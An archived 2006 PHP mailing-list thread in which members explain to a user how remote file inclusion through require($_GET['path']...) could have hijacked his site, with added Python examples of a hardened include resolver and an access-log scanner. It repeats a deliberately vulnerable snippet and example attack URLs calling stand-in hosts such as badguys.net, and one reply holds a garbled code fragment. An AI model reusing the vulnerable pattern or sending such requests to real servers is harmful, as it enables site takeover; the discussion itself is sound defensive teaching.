Re: Fwd: [PHP] Highjack?
At 11:02 PM + 11/14/06, Tom Chubb wrote:
>Posts like this are what makes this list so great! It's better to read this
>here than experience it first hand! Thanks Tedd, for highlighting the problem.
>
>Tom

Tom:

You're welcome, but I never have a problem showing my ignorance -- that just
comes natural. The real thanks should go to the people who provide the answers.

Thanks peoples. :-)

tedd

--
---
http://sperling.com
http://ancientstones.com
http://earthstones.com

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: Fwd: [PHP] Highjack?
Posts like this are what makes this list so great! It's better to read this
here than experience it first hand! Thanks Tedd, for highlighting the problem.

Tom

On 14/11/06, tedd <[EMAIL PROTECTED]> wrote:
> At 9:13 PM + 11/14/06, Stut wrote:
> >Ok, so badscript.php is a bad name for this script. Let's say
> >show.php is a script you've written. You were tired, the kids were
> >running around you screaming and shouting, and you wrote something
> >like the following without really thinking about it...
> >
> > <?php
> > require($_GET['path'].'commonfuncs.inc.php');
> > // Do other stuff here, using functions in commonfuncs.inc.php
> > ?>
> >
> >The *bad guy* can now hit the URL...
> >
> >http://yoursite.com/show.php?path=http://badguys.net/injectionscript.txt?ignored=
> >
> >This causes show.php to include (i.e. execute!!) the remote file
> >injectionscript.txt from badguys.net at this URL...
> >
> >http://badguys.net/injectionscript.txt?ignored=commonfuncs.inc.php
> >
> >Since this gets executed on your server it can do anything one of
> >your scripts can do. The only symptom would be that show.php will
> >not work for that request. Do the bad guys care? Probably not,
> >because by the time it fails they've already replaced your index.php
> >and potentially installed a rootkit, backdoors and whatever else
> >(depending, of course, on how locked down the web server is and your
> >file permissions).
> >
> >Hope that makes sense now.
> >
> >-Stut
>
> Stut:
>
> Yes, I believe that the "require($_GET[])" is one of the things Chris
> Shiflett talks about in his book. I should have guessed that was what
> everyone was talking about. But, considering that I never do that and my
> site was highjacked, I was thinking it must have been something different.
>
> It all makes sense now. Sorry for being so dense.
>
> Thanks everyone.
>
> tedd
>
> PS: My kids are too old to scream -- it's grand-kids now.
Re: Fwd: [PHP] Highjack?
At 9:13 PM + 11/14/06, Stut wrote:
>Ok, so badscript.php is a bad name for this script. Let's say
>show.php is a script you've written. You were tired, the kids were
>running around you screaming and shouting, and you wrote something
>like the following without really thinking about it...
>
> <?php
> require($_GET['path'].'commonfuncs.inc.php');
> // Do other stuff here, using functions in commonfuncs.inc.php
> ?>
>
>The *bad guy* can now hit the URL...
>
>http://yoursite.com/show.php?path=http://badguys.net/injectionscript.txt?ignored=
>
>This causes show.php to include (i.e. execute!!) the remote file
>injectionscript.txt from badguys.net at this URL...
>
>http://badguys.net/injectionscript.txt?ignored=commonfuncs.inc.php
>
>Since this gets executed on your server it can do anything one of
>your scripts can do. The only symptom would be that show.php will
>not work for that request. Do the bad guys care? Probably not,
>because by the time it fails they've already replaced your index.php
>and potentially installed a rootkit, backdoors and whatever else
>(depending, of course, on how locked down the web server is and your
>file permissions).
>
>Hope that makes sense now.
>
>-Stut

Stut:

Yes, I believe that the "require($_GET[])" is one of the things Chris
Shiflett talks about in his book. I should have guessed that was what
everyone was talking about. But, considering that I never do that and my
site was highjacked, I was thinking it must have been something different.

It all makes sense now. Sorry for being so dense.

Thanks everyone.

tedd

PS: My kids are too old to scream -- it's grand-kids now.
Re: Fwd: [PHP] Highjack?
tedd wrote:
> Ohhh, so "badscript.php doesn't have to exist and the badscript.txt is
> imported via the url, the script is built using only the badscript.txt,
> and then executed "as-is" -- clever.
>
> Off to try that... :-)
>
> ...
>
> Nope, that didn't work -- I still don't get it.
>
> I realize that one can grab stuff from another server, but I still
> don't see how one can do this.

Ok, so badscript.php is a bad name for this script. Let's say show.php is
a script you've written. You were tired, the kids were running around you
screaming and shouting, and you wrote something like the following without
really thinking about it...

<?php
require($_GET['path'].'commonfuncs.inc.php');
// Do other stuff here, using functions in commonfuncs.inc.php
?>

The *bad guy* can now hit the URL...

http://yoursite.com/show.php?path=http://badguys.net/injectionscript.txt?ignored=

This causes show.php to include (i.e. execute!!) the remote file
injectionscript.txt from badguys.net at this URL...

http://badguys.net/injectionscript.txt?ignored=commonfuncs.inc.php

Since this gets executed on your server it can do anything one of your
scripts can do. The only symptom would be that show.php will not work for
that request. Do the bad guys care? Probably not, because by the time it
fails they've already replaced your index.php and potentially installed a
rootkit, backdoors and whatever else (depending, of course, on how locked
down the web server is and your file permissions).

Hope that makes sense now.

-Stut
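An added example (mine, not Stut's or tedd's code) that works through, in Python, what the `require($_GET['path'].'commonfuncs.inc.php')` line above computes for the URL Stut gives, and a resolver that maps a short key to a file under a fixed include directory instead of concatenating user input; INCLUDE_DIR and the ALLOWED table are assumed values.

```python
"""Added example, not from the thread: the include target show.php ends up
asking PHP for, and a resolver that never lets the request supply a path."""
import os
from urllib.parse import urlsplit

INCLUDE_DIR = "/var/www/app/inc"   # assumed location of the local includes
SUFFIX = "commonfuncs.inc.php"     # the suffix show.php appends


def vulnerable_target(path_param: str) -> str:
    """What require($_GET['path'].'commonfuncs.inc.php') asks PHP to load.
    With allow_url_fopen (and, from PHP 5.2, allow_url_include) enabled an
    http:// prefix is fetched remotely, and the attacker's trailing
    '?ignored=' turns the appended suffix into a harmless query string."""
    return path_param + SUFFIX


def is_remote_include(target: str) -> bool:
    """True when the computed target carries a URL scheme rather than being
    a filesystem path, i.e. the condition that turns include into RFI."""
    return urlsplit(target).scheme != ""


# Constructed allow-list: the only includes the request may ask for, by key.
ALLOWED = {"common": "commonfuncs.inc.php", "admin": "adminfuncs.inc.php"}


def hardened_target(key: str) -> str:
    """Resolve a short, request-supplied key to a file under INCLUDE_DIR.
    Unknown keys (URLs, '../' sequences, anything else) are rejected, so the
    request can choose among known files but never name a path or host."""
    if key not in ALLOWED:
        raise ValueError("unknown include key: %r" % key)
    target = os.path.normpath(os.path.join(INCLUDE_DIR, ALLOWED[key]))
    # Belt and braces: the normalised path must still sit inside INCLUDE_DIR.
    if os.path.commonpath([INCLUDE_DIR, target]) != INCLUDE_DIR:
        raise ValueError("include escaped INCLUDE_DIR")
    return target
```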
RE: Fwd: [PHP] Highjack?
At 11:57 AM -0800 11/14/06, bruce wrote:
>hi tedd...
>
>for the following url,
>http://www.example.com/test.php?path=abc?dummy=123
>
>if the register_globals is on, a malicious user could potentially invoke,
>http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=123,
>which would cause the 'badscript.txt' to be used in the original script.
>now, this in and of itself wouldn't cause a file on the http server to be
>changed. however, if the webapp somehow caused the $path var to be invoked
>or to be used in an exec() function, then whatever is in the 'badscript.txt'
>file will be run as if the file is on the local system.
>
>at this point, you're pretty much at whim of the malicious user. now, the
>chance of this happening is pretty slim, unless you're using some open
>source app that's unsecure, and that a user can reasonably easy find. which
>is what has happened to some apps in the past.
>
>a more potential reason for the index.php files to be changed, is that there
>was some security hole, either via apache, and/or the OS for the server.
>
>hope this helps a little bit more...

Ohhh, so "badscript.php doesn't have to exist and the badscript.txt is
imported via the url, the script is built using only the badscript.txt, and
then executed "as-is" -- clever.

Off to try that... :-)

...

Nope, that didn't work -- I still don't get it.

I realize that one can grab stuff from another server, but I still don't
see how one can do this.

Sorry, for being so dense.

tedd
RE: Fwd: [PHP] Highjack?
hi tedd...

for the following url,
http://www.example.com/test.php?path=abc?dummy=123

if the register_globals is on, a malicious user could potentially invoke,
http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=123,
which would cause the 'badscript.txt' to be used in the original script.
now, this in and of itself wouldn't cause a file on the http server to be
changed. however, if the webapp somehow caused the $path var to be invoked
or to be used in an exec() function, then whatever is in the 'badscript.txt'
file will be run as if the file is on the local system.

at this point, you're pretty much at whim of the malicious user. now, the
chance of this happening is pretty slim, unless you're using some open
source app that's unsecure, and that a user can reasonably easy find. which
is what has happened to some apps in the past.

a more potential reason for the index.php files to be changed, is that there
was some security hole, either via apache, and/or the OS for the server.

hope this helps a little bit more...

the http://www.example.com/badscript.php?could

-----Original Message-----
From: tedd [mailto:[EMAIL PROTECTED]
Sent: Tuesday, November 14, 2006 11:46 AM
To: Chris Shiflett
Cc: PHP
Subject: Re: Fwd: [PHP] Highjack?

At 1:39 PM -0500 11/14/06, Chris Shiflett wrote:
>tedd wrote:
>> > The script will then include
>> > http://www.badserver.com/badscript.txt?dummy=script.php
>>
>> I still don't see how "badscript.php" can be uploaded into
>> example.com's site in the first place
>
>PHP sends a request to badserver.com for badscript.txt, and the content
>of the response is included just as if it were the content of a local file.
>
>Hope that helps.
>
>Chris

Chris;

I'm still confused.

>At 7:12 PM +0100 11/13/06, Rory Browne wrote:
>
>If register_globals is enabled, someone could
>http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=

If example.com is my domain, then how could evil-doer get access to my
site to place "badscript.php" there?

tedd
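An added example, not from the thread: a small scanner over constructed Apache combined-format access-log lines that flags requests in which a query parameter is itself a URL, the shape of the `?path=http://...` request bruce describes, so an attempt can be found after the fact even when, as Stut notes, the only visible symptom was the script failing for that request. The hosts, paths and timestamps in SAMPLE_LOG are made up.

```python
"""Added example, not from the thread: flag access-log requests whose query
parameter value is a remote URL (the remote-include request shape)."""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines; addresses, paths and agents are invented.
SAMPLE_LOG = """\
203.0.113.9 - - [14/Nov/2006:21:13:02 +0000] "GET /show.php?path=inc/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [14/Nov/2006:21:14:10 +0000] "GET /show.php?path=http://badguys.net/injectionscript.txt?ignored= HTTP/1.1" 500 0 "-" "libwww-perl/5.805"
203.0.113.9 - - [14/Nov/2006:21:15:44 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [14/Nov/2006:21:16:01 +0000] "GET /test.php?path=https%3A%2F%2Fbadguys.net%2Fx.txt%3F HTTP/1.1" 200 77 "-" "curl/7.15"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target proto", status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
REMOTE_SCHEMES = {"http", "https", "ftp"}


def rfi_parameters(target: str) -> list:
    """Return the (name, value) pairs of the request's query string whose
    value carries a remote URL scheme. parse_qsl percent-decodes values, so
    an encoded 'https%3A%2F%2F' is caught the same as a plain 'https://'."""
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if urlsplit(v).scheme.lower() in REMOTE_SCHEMES]


def scan_log(text: str) -> list:
    """One finding per request that carries a remote-URL parameter, keeping
    the client, timestamp and status so a 500 (include failed) and a 200
    (include succeeded) can be told apart during triage."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # not a parsable request line
        hits = rfi_parameters(m.group("target"))
        if hits:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "status": int(m.group("status")), "params": hits})
    return findings
```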
Re: Fwd: [PHP] Highjack?
tedd wrote:
> At 1:39 PM -0500 11/14/06, Chris Shiflett wrote:
>> tedd wrote:
>>> > The script will then include
>>> > http://www.badserver.com/badscript.txt?dummy=script.php
>>>
>>> I still don't see how "badscript.php" can be uploaded into
>>> example.com's site in the first place
>>
>> PHP sends a request to badserver.com for badscript.txt, and the content
>> of the response is included just as if it were the content of a local
>> file.
>>
>> Hope that helps.
>>
>> Chris
>
> Chris;
>
> I'm still confused.
>
>> At 7:12 PM +0100 11/13/06, Rory Browne wrote:
>>
>> If register_globals is enabled, someone could
>> http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=
>>
>
> If example.com is my domain, then how could evil-doer get access to my
> site to place "badscript.php" there?

in this hypothetical situation you're a complete moron and you wrote this script:

http://www.badserver.com/badscript.txt?dummy='; include $path; ?>

and bad script contains:

of course, in real life you're not that stupid at all - but subtler versions
of such vulns occur all over the place :-/

anyway Chris' site(s) have lots of info on this subject - I recommend reading
till something sticks (at least that's my tactic :-)

> tedd
RE: Fwd: [PHP] Highjack?
(Top posting, as seems to be the trend in this thread)

Tedd,

It might be that you are hosting on a shared host, and that the attacker
compromised another site on that host giving him access to your (and
everyone else's) web root.

If that is the case, your hosting provider needs to look into their file
system security policies, and you need to re-evaluate your choice of
providers.

JM

> hi tedd...
>
> for the following url,
> http://www.example.com/test.php?path=abc?dummy=123
>
> if the register_globals is on, a malicious user could potentially invoke,
> http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=123,
> which would cause the 'badscript.txt' to be used in the original script.
> now, this in and of itself wouldn't cause a file on the http server to be
> changed. however, if the webapp somehow caused the $path var to be invoked
> or to be used in an exec() function, then whatever is in the 'badscript.txt'
> file will be run as if the file is on the local system.
>
> at this point, you're pretty much at whim of the malicious user. now, the
> chance of this happening is pretty slim, unless you're using some open
> source app that's unsecure, and that a user can reasonably easy find. which
> is what has happened to some apps in the past.
>
> a more potential reason for the index.php files to be changed, is that there
> was some security hole, either via apache, and/or the OS for the server.
>
> hope this helps a little bit more...
>
> the http://www.example.com/badscript.php?could
>
> -----Original Message-----
> From: tedd [mailto:[EMAIL PROTECTED]
> Sent: Tuesday, November 14, 2006 11:46 AM
> To: Chris Shiflett
> Cc: PHP
> Subject: Re: Fwd: [PHP] Highjack?
>
> At 1:39 PM -0500 11/14/06, Chris Shiflett wrote:
> >tedd wrote:
> >> > The script will then include
> >> > http://www.badserver.com/badscript.txt?dummy=script.php
> >>
> >> I still don't see how "badscript.php" can be uploaded into
> >> example.com's site in the first place
> >
> >PHP sends a request to badserver.com for badscript.txt, and the content
> >of the response is included just as if it were the content of a local file.
> >
> >Hope that helps.
> >
> >Chris
>
> Chris;
>
> I'm still confused.
>
> >At 7:12 PM +0100 11/13/06, Rory Browne wrote:
> >
> >If register_globals is enabled, someone could
> >http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=
>
> If example.com is my domain, then how could evil-doer get access to my
> site to place "badscript.php" there?
>
> tedd
RE: Fwd: [PHP] Highjack?
At 11:57 AM -0800 11/14/06, bruce wrote:
>hi tedd...
>
>for the following url,
>http://www.example.com/test.php?path=abc?dummy=123
>
>if the register_globals is on, a malicious user could potentially invoke,
>http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=123,
>which would cause the 'badscript.txt' to be used in the original script.
>now, this in and of itself wouldn't cause a file on the http server to be
>changed. however, if the webapp somehow caused the $path var to be invoked
>or to be used in an exec() function, then whatever is in the 'badscript.txt'
>file will be run as if the file is on the local system.
>
>at this point, you're pretty much at whim of the malicious user. now, the
>chance of this happening is pretty slim, unless you're using some open
>source app that's unsecure, and that a user can reasonably easy find. which
>is what has happened to some apps in the past.
>
>a more potential reason for the index.php files to be changed, is that there
>was some security hole, either via apache, and/or the OS for the server.
>
>hope this helps a little bit more...

Ohhh, so "badscript.php doesn't have to exist and the badscript.txt is
imported via the url, the script is built using only the badscript.txt, and
then executed "as-is" -- clever.

Off to try that... :-)

Thanks.

tedd
Re: Fwd: [PHP] Highjack?
At 1:39 PM -0500 11/14/06, Chris Shiflett wrote:
>tedd wrote:
>> > The script will then include
>> > http://www.badserver.com/badscript.txt?dummy=script.php
>>
>> I still don't see how "badscript.php" can be uploaded into
>> example.com's site in the first place
>
>PHP sends a request to badserver.com for badscript.txt, and the content
>of the response is included just as if it were the content of a local file.
>
>Hope that helps.
>
>Chris

Chris;

I'm still confused.

>At 7:12 PM +0100 11/13/06, Rory Browne wrote:
>
>If register_globals is enabled, someone could
>http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=

If example.com is my domain, then how could evil-doer get access to my
site to place "badscript.php" there?

tedd
Re: Fwd: [PHP] Highjack?
tedd wrote:
> > The script will then include
> > http://www.badserver.com/badscript.txt?dummy=script.php
>
> I still don't see how "badscript.php" can be uploaded into
> example.com's site in the first place

PHP sends a request to badserver.com for badscript.txt, and the content
of the response is included just as if it were the content of a local file.

Hope that helps.

Chris

--
Chris Shiflett
http://shiflett.org/
Re: Fwd: [PHP] Highjack?
At 7:12 PM +0100 11/13/06, Rory Browne wrote:
>If register_globals is enabled, someone could
>http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=
>
>The script will then include
>http://www.badserver.com/badscript.txt?dummy=script.php

I still don't see how "badscript.php" can be uploaded into example.com's
site in the first place -- unless "badscript.php" is not part of the
evil-doers code but rather just a poor script.

I have noticed that the host has disabled "shell_exec()" since the attack
-- so, I wonder if this was the cause or just a shotgun approach to server
protection. However, he still has register_globals ON and safe_mode OFF.

tedd